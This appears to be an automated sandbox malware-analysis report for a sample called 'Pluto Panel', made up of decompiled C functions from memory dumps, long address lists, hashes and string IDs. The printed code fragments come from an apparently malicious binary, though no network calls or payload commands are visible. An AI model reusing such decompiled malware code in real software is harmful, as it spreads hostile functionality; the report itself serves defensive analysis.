						 *(_t106 + _t92 * 4) =  *(_t106 + _t92 * 4) ^ _t87;
						_a4 = _a4 + 1;
						_t85 = _t85 + 1;
					} while (_t85 < _v32);
				}
				return _t84;
			}











































                                                                                                          0x00f760cf
                                                                                                          0x00f760da
                                                                                                          0x00f760de
                                                                                                          0x00f760e2
                                                                                                          0x00f760e6
                                                                                                          0x00f760ea
                                                                                                          0x00f760ee
                                                                                                          0x00f760f2
                                                                                                          0x00f760f6
                                                                                                          0x00f760fa
                                                                                                          0x00f760fe
                                                                                                          0x00f76102
                                                                                                          0x00f76106
                                                                                                          0x00f7610a
                                                                                                          0x00f7610e
                                                                                                          0x00f76112
                                                                                                          0x00f76116
                                                                                                          0x00f7611a
                                                                                                          0x00f76120
                                                                                                          0x00f7612e
                                                                                                          0x00f76134
                                                                                                          0x00f76147
                                                                                                          0x00f7614e
                                                                                                          0x00f7615c
                                                                                                          0x00f76163
                                                                                                          0x00f7616e
                                                                                                          0x00f7617f
                                                                                                          0x00f76182
                                                                                                          0x00f76185
                                                                                                          0x00f76196
                                                                                                          0x00f76199
                                                                                                          0x00f7619f
                                                                                                          0x00f761b8
                                                                                                          0x00f761cd
                                                                                                          0x00f761cf
                                                                                                          0x00f761d5
                                                                                                          0x00f761d6
                                                                                                          0x00f761db
                                                                                                          0x00f761de
                                                                                                          0x00f761e4
                                                                                                          0x00f761e5
                                                                                                          0x00f761ea
                                                                                                          0x00f761ed
                                                                                                          0x00f761f0
                                                                                                          0x00f761f5
                                                                                                          0x00f761f6
                                                                                                          0x00f761f7
                                                                                                          0x00f76202
                                                                                                          0x00f76207
                                                                                                          0x00f76209
                                                                                                          0x00f7620f
                                                                                                          0x00f76212
                                                                                                          0x00f76218
                                                                                                          0x00f7621e
                                                                                                          0x00f7621e
                                                                                                          0x00f76222
                                                                                                          0x00f76225
                                                                                                          0x00f7622e
                                                                                                          0x00f76230
                                                                                                          0x00f76237
                                                                                                          0x00f76238
                                                                                                          0x00f7620f
                                                                                                          0x00f76240
                                                                                                          0x00f76242
                                                                                                          0x00f76245
                                                                                                          0x00f7624b
                                                                                                          0x00f76251
                                                                                                          0x00f76251
                                                                                                          0x00f7625a
                                                                                                          0x00f7625d
                                                                                                          0x00f76266
                                                                                                          0x00f76268
                                                                                                          0x00f7626b
                                                                                                          0x00f7626c
                                                                                                          0x00f76242
                                                                                                          0x00f76275

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Offset: 00F10000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.701197443.0000000000F10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.701947356.0000000000F92000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_f10000_Pluto Panel.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 5$H$O$b$i$}$}
                                                                                                          • API String ID: 0-3760989150
                                                                                                          • Opcode ID: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                                                          • Instruction ID: abfd86182514714b9cd0d83e6a934614f71e27a478e83c6518f788ee169f695d
                                                                                                          • Opcode Fuzzy Hash: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                                                          • Instruction Fuzzy Hash: 4F51D87180025DAEDF11DBA8CC40AEEBBBCEF49314F0482E9E559E6192D7389B44CB61
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00F71642 Relevance: 8.9, Strings: 7, Instructions: 118COMMON
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 83%
                                                                                                          			E00F71642(void* __fp0) {
				void* __esi;
				void* _t65;
				signed int _t89;
				void* _t92;
				intOrPtr _t106;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t118;

				_t118 = __fp0;
				_t108 = _t110 - 0x70;
				_t111 = _t110 - 0x474;
				 *((intOrPtr*)(_t108 + 0x40)) = 0x412774;
				 *((intOrPtr*)(_t108 + 0x44)) = 0x412784;
				 *((intOrPtr*)(_t108 + 0x48)) = 0x412794;
				 *((intOrPtr*)(_t108 + 0x4c)) = 0x4127a4;
				 *((intOrPtr*)(_t108 + 0x50)) = 0x4127b4;
				 *((intOrPtr*)(_t108 + 0x54)) = 0x4127c0;
				 *((intOrPtr*)(_t108 + 0x58)) = 0x4127cc;
				 *((intOrPtr*)(_t108 + 0x5c)) = 0x4127d8;
				 *((intOrPtr*)(_t108 + 0x20)) = 0x41263c;
				 *((intOrPtr*)(_t108 + 0x24)) = 0x412648;
				 *((intOrPtr*)(_t108 + 0x28)) = 0x4127e4;
				 *((intOrPtr*)(_t108 + 0x2c)) = 0x412664;
				 *((intOrPtr*)(_t108 + 0x30)) = 0x4126b4;
				 *((intOrPtr*)(_t108 + 0x34)) = 0x4126c0;
				 *((intOrPtr*)(_t108 + 0x38)) = 0x4127f4;
				 *((intOrPtr*)(_t108 + 0x3c)) = 0x4126dc;
				 *((intOrPtr*)(_t108 + 0x60)) = 0x412800;
				 *((intOrPtr*)(_t108 + 0x64)) = 0x412810;
				 *((intOrPtr*)(_t108 + 0x68)) = 0x412820;
				 *((intOrPtr*)(_t108 + 0x6c)) = 0x412834;
				_t89 = 0;
				do {
					_push(0x7f);
					_push(0);
					_push(_t108 - 0x5f);
					 *((char*)(_t108 - 0x60)) = 0;
					L00F803F4();
					_t111 = _t111 + 0xc;
					_t97 = _t89 << 2;
					_t65 = E00F71819(_t108 - 0x60,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + (_t89 << 2) + 0x50)));
					if(_t65 != 0) {
						E00F7104A(_t108 - 0x404);
						_push(_t108 - 0x60);
						_push(_t108 - 0x1f0);
						L00F803FA();
						_pop(_t92);
						 *((intOrPtr*)(_t108 - 0x378)) =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x78)) + 0xb1c));
						_t37 = _t89 + 1; // 0x1
						 *((intOrPtr*)(_t108 - 0x1f4)) = _t37;
						E00F71819(_t108 - 0x2f4,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x20)));
						E00F71819(_t108 - 0x3f8,  *((intOrPtr*)(_t108 + 0x7c)), 0x412844);
						E00F71819(_t108 - 0x374,  *((intOrPtr*)(_t108 + 0x7c)), 0x412854);
						if(_t89 != 3) {
							E00F71819(_t108 - 0x274,  *((intOrPtr*)(_t108 + 0x7c)), 0x412664);
							E00F7D9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)), 0x4126dc, _t108 - 0x68);
							_t111 = _t111 + 0xc;
						}
						E00F7D9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x30)), _t108 - 0x70);
						E00F7D9CB(_t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x60)), _t108 - 0x6c);
						_t106 =  *((intOrPtr*)(_t108 + 0x78));
						_t111 = _t111 + 0x18;
						E00F712DE(_t106, _t92,  *((intOrPtr*)(_t108 + 0x7c)),  *((intOrPtr*)(_t108 + _t97 + 0x40)), _t108 - 0x170, 1);
						_push(_t106 + 0xa9c);
						_push(_t108 - 0xf0);
						L00F803FA();
						_t65 = E00F71279(_t108 - 0x404, _t118, _t106);
					}
					_t89 = _t89 + 1;
				} while (_t89 < 4);
				return _t65;
			}












                                                                                                          0x00f71642
                                                                                                          0x00f71643
                                                                                                          0x00f71647
                                                                                                          0x00f71650
                                                                                                          0x00f71657
                                                                                                          0x00f7165e
                                                                                                          0x00f71665
                                                                                                          0x00f7166c
                                                                                                          0x00f71673
                                                                                                          0x00f7167a
                                                                                                          0x00f71681
                                                                                                          0x00f71688
                                                                                                          0x00f7168f
                                                                                                          0x00f71696
                                                                                                          0x00f7169d
                                                                                                          0x00f716a4
                                                                                                          0x00f716ab
                                                                                                          0x00f716b2
                                                                                                          0x00f716b9
                                                                                                          0x00f716c0
                                                                                                          0x00f716c7
                                                                                                          0x00f716ce
                                                                                                          0x00f716d5
                                                                                                          0x00f716dc
                                                                                                          0x00f716de
                                                                                                          0x00f716de
                                                                                                          0x00f716e3
                                                                                                          0x00f716e5
                                                                                                          0x00f716e6
                                                                                                          0x00f716ea
                                                                                                          0x00f716ef
                                                                                                          0x00f716f4
                                                                                                          0x00f71701
                                                                                                          0x00f71708
                                                                                                          0x00f71714
                                                                                                          0x00f7171c
                                                                                                          0x00f71723
                                                                                                          0x00f71724
                                                                                                          0x00f71733
                                                                                                          0x00f71738
                                                                                                          0x00f71741
                                                                                                          0x00f7174a
                                                                                                          0x00f71750
                                                                                                          0x00f71763
                                                                                                          0x00f71776
                                                                                                          0x00f7177e
                                                                                                          0x00f7178e
                                                                                                          0x00f7179f
                                                                                                          0x00f717a4
                                                                                                          0x00f717a4
                                                                                                          0x00f717b2
                                                                                                          0x00f717c2
                                                                                                          0x00f717c7
                                                                                                          0x00f717ca
                                                                                                          0x00f717df
                                                                                                          0x00f717ea
                                                                                                          0x00f717f1
                                                                                                          0x00f717f2
                                                                                                          0x00f71800
                                                                                                          0x00f71800
                                                                                                          0x00f71805
                                                                                                          0x00f71806
                                                                                                          0x00f71816

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Offset: 00F10000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.701197443.0000000000F10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.701947356.0000000000F92000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_f10000_Pluto Panel.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (A$4(A$<&A$H&A$d&A$t'A$'A
                                                                                                          • API String ID: 0-2857912252
                                                                                                          • Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                                          • Instruction ID: 735994f9aabb602cd868e408b640ea5ec7e3f6be88ecc496dc3ed47337b23c79
                                                                                                          • Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                                          • Instruction Fuzzy Hash: B7517AB190024D9FDF24EF64DD459DD3BB8FF04308F10802AF928A6152D3B999A9DF89
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00F72E88 Relevance: 6.3, Strings: 5, Instructions: 69COMMON
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00F72E88(intOrPtr* __edi, void* __eflags) {
				void* __esi;
				intOrPtr* _t49;
				intOrPtr* _t50;
				intOrPtr* _t51;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr* _t59;

				_t60 = __edi;
				E00F77340(__edi, __eflags);
				 *((intOrPtr*)(__edi + 0x1d8)) = 0;
				 *((intOrPtr*)(__edi + 0x1cc)) = 0;
				 *((intOrPtr*)(__edi + 0x1d0)) = 0;
				 *((intOrPtr*)(__edi + 0x1d4)) = 0;
				_t5 = _t60 + 0x1e0; // 0x1e0
				_t49 = _t5;
				 *((intOrPtr*)(__edi + 0x1dc)) = 0x100;
				 *_t49 = 0x413754;
				 *((intOrPtr*)(_t49 + 0x10)) = 0;
				 *((intOrPtr*)(_t49 + 4)) = 0;
				 *((intOrPtr*)(_t49 + 8)) = 0;
				 *((intOrPtr*)(_t49 + 0x14)) = 0x100;
				 *((intOrPtr*)(_t49 + 0xc)) = 0;
				 *_t49 = 0x413760;
				 *((intOrPtr*)(__edi + 0x1c8)) = 0x413758;
				_t13 = _t60 + 0x1f8; // 0x1f8
				_t50 = _t13;
				 *((intOrPtr*)(_t50 + 4)) = 0;
				 *((intOrPtr*)(_t50 + 8)) = 0;
				 *((intOrPtr*)(_t50 + 0xc)) = 0;
				 *((intOrPtr*)(_t50 + 0x10)) = 0;
				 *((intOrPtr*)(_t50 + 0x14)) = 0;
				 *((intOrPtr*)(_t50 + 0x18)) = 0;
				 *((intOrPtr*)(_t50 + 0x1c)) = 0;
				 *_t50 = 0;
				_t21 = _t60 + 0x630; // 0x630
				_t51 = _t21;
				 *((intOrPtr*)(_t51 + 8)) = 0x20;
				 *_t51 = 0;
				 *((intOrPtr*)(_t51 + 0xc)) = 0;
				 *((intOrPtr*)(_t51 + 4)) = 0;
				 *((char*)(__edi + 0x52a)) = 0;
				_t26 = _t60 + 0x64c; // 0x64c
				 *((intOrPtr*)(__edi + 0x640)) = 0x412e80;
				E00F73549(_t26);
				 *((intOrPtr*)(__edi + 0x858)) = 0x413144;
				 *((intOrPtr*)(__edi + 0x86c)) = 0x4130f0;
				_t30 = _t60 + 0x870; // 0x870
				_t53 = _t30;
				 *_t53 = 0x4130f0;
				_t31 = _t60 + 0x878; // 0x878
				_t59 = _t31;
				 *_t59 = 0x413144;
				 *_t53 = 0x412f34;
				_t32 = _t60 + 0x87c; // 0x87c
				_t54 = _t32;
				 *__edi = 0x412e98;
				 *((intOrPtr*)(__edi + 0x1c8)) = 0x412f1c;
				 *((intOrPtr*)(__edi + 0x1e0)) = 0x413760;
				 *((intOrPtr*)(__edi + 0x640)) = 0x412f24;
				 *((intOrPtr*)(__edi + 0x858)) = 0x412f2c;
				 *((intOrPtr*)(__edi + 0x86c)) = 0x412f30;
				 *_t59 = 0x412f38;
				_t38 = _t60 + 0x890; // 0x890
				 *_t54 = 0x413bd8;
				 *((intOrPtr*)(_t54 + 8)) = 0;
				 *((intOrPtr*)(_t54 + 0x10)) = 0;
				 *((intOrPtr*)(_t54 + 4)) = 0;
				 *((intOrPtr*)(_t54 + 0xc)) = 0;
				E00F73549(_t38);
				 *((char*)(__edi + 0xb20)) = 0;
				 *((char*)(__edi + 0xc25)) = 0;
				 *((char*)(__edi + 0xd2a)) = 0;
				 *((char*)(__edi + 0xe2f)) = 0;
				 *((char*)(__edi + 0xa9c)) = 0;
				return __edi;
			}










                                                                                                          0x00f72e88
                                                                                                          0x00f72e8c
                                                                                                          0x00f72e93
                                                                                                          0x00f72e99
                                                                                                          0x00f72e9f
                                                                                                          0x00f72ea5
                                                                                                          0x00f72eab
                                                                                                          0x00f72eab
                                                                                                          0x00f72eb6
                                                                                                          0x00f72ebc
                                                                                                          0x00f72ec2
                                                                                                          0x00f72ec5
                                                                                                          0x00f72ec8
                                                                                                          0x00f72ecb
                                                                                                          0x00f72ece
                                                                                                          0x00f72ed1
                                                                                                          0x00f72ed7
                                                                                                          0x00f72ee1
                                                                                                          0x00f72ee1
                                                                                                          0x00f72ee7
                                                                                                          0x00f72eea
                                                                                                          0x00f72eed
                                                                                                          0x00f72ef0
                                                                                                          0x00f72ef3
                                                                                                          0x00f72ef6
                                                                                                          0x00f72ef9
                                                                                                          0x00f72efc
                                                                                                          0x00f72efe
                                                                                                          0x00f72efe
                                                                                                          0x00f72f04
                                                                                                          0x00f72f0b
                                                                                                          0x00f72f0d
                                                                                                          0x00f72f10
                                                                                                          0x00f72f13
                                                                                                          0x00f72f19
                                                                                                          0x00f72f1f
                                                                                                          0x00f72f29
                                                                                                          0x00f72f2e
                                                                                                          0x00f72f38
                                                                                                          0x00f72f42
                                                                                                          0x00f72f42
                                                                                                          0x00f72f48
                                                                                                          0x00f72f4e
                                                                                                          0x00f72f4e
                                                                                                          0x00f72f54
                                                                                                          0x00f72f5a
                                                                                                          0x00f72f60
                                                                                                          0x00f72f60
                                                                                                          0x00f72f66
                                                                                                          0x00f72f6c
                                                                                                          0x00f72f76
                                                                                                          0x00f72f80
                                                                                                          0x00f72f8a
                                                                                                          0x00f72f94
                                                                                                          0x00f72f9e
                                                                                                          0x00f72fa4
                                                                                                          0x00f72faa
                                                                                                          0x00f72fb0
                                                                                                          0x00f72fb3
                                                                                                          0x00f72fb6
                                                                                                          0x00f72fb9
                                                                                                          0x00f72fbc
                                                                                                          0x00f72fc1
                                                                                                          0x00f72fc7
                                                                                                          0x00f72fcd
                                                                                                          0x00f72fd3
                                                                                                          0x00f72fda
                                                                                                          0x00f72fe3

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Offset: 00F10000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.701197443.0000000000F10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.701947356.0000000000F92000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_f10000_Pluto Panel.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $/A$,/A$0/A$X7A$`7A
                                                                                                          • API String ID: 0-851144607
                                                                                                          • Opcode ID: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                                                          • Instruction ID: 441e2fda261442229fcda347b3d52f41cb1bd8f8564d279534b8ff214ad84a0f
                                                                                                          • Opcode Fuzzy Hash: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                                                          • Instruction Fuzzy Hash: F24183B0655742EFC3498F2AC5846C1FBE0BB09314F96C2AFC46C9B211C7B4A565CF99
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00F73021 Relevance: 6.3, Strings: 5, Instructions: 27COMMON
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00F73021(intOrPtr* __esi) {
				void* __edi;
				intOrPtr* _t20;
				void* _t24;

				_t20 = __esi + 0x878;
				 *__esi = 0x412e98;
				 *((intOrPtr*)(__esi + 0x1c8)) = 0x412f1c;
				 *((intOrPtr*)(__esi + 0x1e0)) = 0x413760;
				 *((intOrPtr*)(__esi + 0x640)) = 0x412f24;
				 *((intOrPtr*)(__esi + 0x858)) = 0x412f2c;
				 *((intOrPtr*)(__esi + 0x86c)) = 0x412f30;
				 *((intOrPtr*)(__esi + 0x870)) = 0x412f34;
				 *_t20 = 0x412f38;
				E00F73663(__esi + 0x890);
				 *((intOrPtr*)(__esi + 0x87c)) = 0x413bd8;
				E00F7D71D(__esi + 0x87c);
				 *_t20 = 0x413144;
				 *((intOrPtr*)(__esi + 0x870)) = 0x4130f0;
				E00F73663(__esi + 0x64c);
				E00F72FE4(__esi + 0x1c8, _t24);
				return E00F7744A(__esi);
			}






                                                                                                          0x00f73029
                                                                                                          0x00f73035
                                                                                                          0x00f7303b
                                                                                                          0x00f73041
                                                                                                          0x00f7304b
                                                                                                          0x00f73055
                                                                                                          0x00f7305f
                                                                                                          0x00f73069
                                                                                                          0x00f73073
                                                                                                          0x00f73079
                                                                                                          0x00f73084
                                                                                                          0x00f7308a
                                                                                                          0x00f7308f
                                                                                                          0x00f7309b
                                                                                                          0x00f730a5
                                                                                                          0x00f730aa
                                                                                                          0x00f730b8

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Offset: 00F10000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.701197443.0000000000F10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.701947356.0000000000F92000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_f10000_Pluto Panel.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $/A$,/A$0/A$4/A$`7A
                                                                                                          • API String ID: 0-2435369464
                                                                                                          • Opcode ID: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                                                          • Instruction ID: b702a05e3d18b24217cde6c81ee1b33bcab95f560262bb4fbf2bb2f4250d9775
                                                                                                          • Opcode Fuzzy Hash: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                                                          • Instruction Fuzzy Hash: 6001FFB4000745CAC721EF20C5406C6BBF4FB40305F50C50FE0AD47204DBB9A19AEF55
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00F39829 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 88%
                                                                                                          			E00F39829(intOrPtr _a4, signed char* _a8, intOrPtr _a12, char _a16, signed int* _a20) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				void* __edi;
				void* __esi;
				signed int _t66;
				void* _t70;
				intOrPtr _t71;
				signed int _t74;
				signed int _t84;
				void* _t85;
				signed int _t94;
				signed int* _t95;
				signed int _t96;
				signed int* _t97;
				signed char* _t100;
				signed int _t101;
				signed char _t104;
				signed char* _t136;
				intOrPtr _t140;

				_t136 = _a8;
				_v20 = 0;
				_v8 = 0;
				_v12 = 1;
				_v16 = 0x4435dc;
				if(_t136 != 0) {
					_t101 =  *_t136 & 0x000000ff;
					if(_t101 == 0x84) {
						_t101 = _t136[0x23] & 0x000000ff;
					}
					if(_t101 != 0x9c) {
						L8:
						if(_t101 == 0x5e || _t101 == 0x82 || _t101 == 0x81) {
							_t140 = _a4;
							_t66 = E00F3980E(_t140);
							_v8 = _t66;
							if(_t66 == 0) {
								goto L22;
							}
							if((_t136[2] & 0x00000400) == 0) {
								_push(_t136[4]);
								_t71 = E00F2CE3A(0x44a3c8, _v16);
								_v20 = _t71;
								if(_t71 != 0) {
									_t129 = _v8;
									if(_v8 != 0) {
										E00F393C1(0x41315e, _t129, _t71, 1);
									}
									if(_t101 == 0x82) {
										 *((char*)(_v8 + 0x1e)) = 2;
									}
									L27:
									if(_t101 == 0x81 || _t101 == 0x82) {
										if(_a16 != 0x62) {
											goto L31;
										}
										_push(0x63);
										goto L32;
									} else {
										L31:
										_push(_a16);
										L32:
										E00F3BE00(_v8);
										_t74 = _v8;
										if(( *(_t74 + 0x1c) & 0x0000000c) != 0) {
											 *(_t74 + 0x1c) =  *(_t74 + 0x1c) & 0x0000fffd;
										}
										goto L34;
									}
								}
								goto L22;
							}
							E00F39280(_v8, _t136[4] * _v12, _t136[4] * _v12 >> 0x20);
							goto L27;
						} else {
							if(_t101 != 0x9c) {
								if(_t101 != 0x83) {
									L36:
									 *_a20 = _v8;
									goto L37;
								}
								_t140 = _a4;
								_t84 = E00F3980E(_t140);
								_v8 = _t84;
								if(_t84 == 0) {
									L22:
									 *((char*)(_t140 + 0x1e)) = 1;
									E00F2C16B(_t140, _v20);
									E00F39A4C(_v8);
									 *_a20 =  *_a20 & 0x00000000;
									_t70 = 7;
									return _t70;
								}
								_t85 = E00F2D157(_t136[4] + 2);
								asm("cdq");
								E00F393C1(0x41315e, _v8, E00F2D801(_t140, 0x9c, _t136[4] + 2, _t85 - 1), 0);
								L17:
								L34:
								_t108 = _v8;
								if(_v8 != 0) {
									E00F3BCAB(_t108);
								}
								goto L36;
							}
							L12:
							if(E00F39829(_a4, _t136[8], _a12, _a16,  &_v8) != 0) {
								goto L34;
							}
							E00F391BB(_v8);
							_t94 = _v8;
							_t95 = _t94 + 0x10;
							asm("adc edx, 0x0");
							 *_t95 =  ~( *_t95);
							_t95[1] =  ~( *(_t94 + 0x14));
							_t96 = _v8;
							_t97 = _t96 + 8;
							asm("adc edx, 0x0");
							 *_t97 =  ~( *_t97);
							_t97[1] =  ~( *(_t96 + 0xc));
							E00F3BE00(_v8, _a16);
							goto L17;
						}
					}
					_t100 = _t136[8];
					_t104 =  *_t100;
					if(_t104 == 0x81 || _t104 == 0x82) {
						_v12 = _v12 | 0xffffffff;
						_t136 = _t100;
						_t101 =  *_t136 & 0x000000ff;
						_v16 = 0x44a3c4;
						goto L8;
					} else {
						goto L12;
					}
				} else {
					 *_a20 = 0;
					L37:
					return 0;
				}
			}
























                                                                                                          0x00f39834
                                                                                                          0x00f39839
                                                                                                          0x00f3983c
                                                                                                          0x00f3983f
                                                                                                          0x00f39846
                                                                                                          0x00f3984d
                                                                                                          0x00f39859
                                                                                                          0x00f39862
                                                                                                          0x00f39864
                                                                                                          0x00f39864
                                                                                                          0x00f3986f
                                                                                                          0x00f39890
                                                                                                          0x00f39893
                                                                                                          0x00f3996d
                                                                                                          0x00f39970
                                                                                                          0x00f39977
                                                                                                          0x00f3997a
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f39982
                                                                                                          0x00f39998
                                                                                                          0x00f399a3
                                                                                                          0x00f399ad
                                                                                                          0x00f399b0
                                                                                                          0x00f399d4
                                                                                                          0x00f399d9
                                                                                                          0x00f399e6
                                                                                                          0x00f399ec
                                                                                                          0x00f399f3
                                                                                                          0x00f399f8
                                                                                                          0x00f399f8
                                                                                                          0x00f399fc
                                                                                                          0x00f39a02
                                                                                                          0x00f39a10
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f39a12
                                                                                                          0x00000000
                                                                                                          0x00f39a16
                                                                                                          0x00f39a16
                                                                                                          0x00f39a16
                                                                                                          0x00f39a19
                                                                                                          0x00f39a1c
                                                                                                          0x00f39a21
                                                                                                          0x00f39a29
                                                                                                          0x00f39a2b
                                                                                                          0x00f39a2b
                                                                                                          0x00000000
                                                                                                          0x00f39a29
                                                                                                          0x00f39a02
                                                                                                          0x00000000
                                                                                                          0x00f399b0
                                                                                                          0x00f3998f
                                                                                                          0x00000000
                                                                                                          0x00f398b1
                                                                                                          0x00f398b3
                                                                                                          0x00f3991e
                                                                                                          0x00f39a3d
                                                                                                          0x00f39a43
                                                                                                          0x00000000
                                                                                                          0x00f39a43
                                                                                                          0x00f39924
                                                                                                          0x00f39927
                                                                                                          0x00f3992e
                                                                                                          0x00f39931
                                                                                                          0x00f399b2
                                                                                                          0x00f399b5
                                                                                                          0x00f399ba
                                                                                                          0x00f399c4
                                                                                                          0x00f399cc
                                                                                                          0x00f399d1
                                                                                                          0x00000000
                                                                                                          0x00f399d1
                                                                                                          0x00f3993a
                                                                                                          0x00f39944
                                                                                                          0x00f39961
                                                                                                          0x00f39967
                                                                                                          0x00f39a31
                                                                                                          0x00f39a31
                                                                                                          0x00f39a36
                                                                                                          0x00f39a38
                                                                                                          0x00f39a38
                                                                                                          0x00000000
                                                                                                          0x00f39a36
                                                                                                          0x00f398b5
                                                                                                          0x00f398cf
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f398d8
                                                                                                          0x00f398dd
                                                                                                          0x00f398e3
                                                                                                          0x00f398ed
                                                                                                          0x00f398f0
                                                                                                          0x00f398f4
                                                                                                          0x00f398f7
                                                                                                          0x00f398fd
                                                                                                          0x00f39904
                                                                                                          0x00f39909
                                                                                                          0x00f3990b
                                                                                                          0x00f39911
                                                                                                          0x00000000
                                                                                                          0x00f39911
                                                                                                          0x00f39893
                                                                                                          0x00f39871
                                                                                                          0x00f39874
                                                                                                          0x00f39879
                                                                                                          0x00f39880
                                                                                                          0x00f39884
                                                                                                          0x00f39886
                                                                                                          0x00f39889
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00f3984f
                                                                                                          0x00f39852
                                                                                                          0x00f39a45
                                                                                                          0x00000000
                                                                                                          0x00f39a45

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Offset: 00F10000, based on PE: true
                                                                                                          • Associated: 00000005.00000002.701197443.0000000000F10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000005.00000002.701947356.0000000000F92000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_f10000_Pluto Panel.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ^$^1A$^1A$b
                                                                                                          • API String ID: 0-1727528133
                                                                                                          • Opcode ID: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
                                                                                                          • Instruction ID: e86dbdba6889de86e2e86cbb71def602b0c0b0d55fad575dd0acedc568363d1e
                                                                                                          • Opcode Fuzzy Hash: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
                                                                                                          • Instruction Fuzzy Hash: 2761AF31E08205AFDF14DF68C8817ADBBB1EF45330F248159E815AB292D7F99E50AB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Executed Functions

                                                                                                          Function 02F01728 Relevance: 4.2, Strings: 3, Instructions: 446COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.703652502.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_2f00000_test.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (Mk$,$#ij^
                                                                                                          • API String ID: 0-33671148
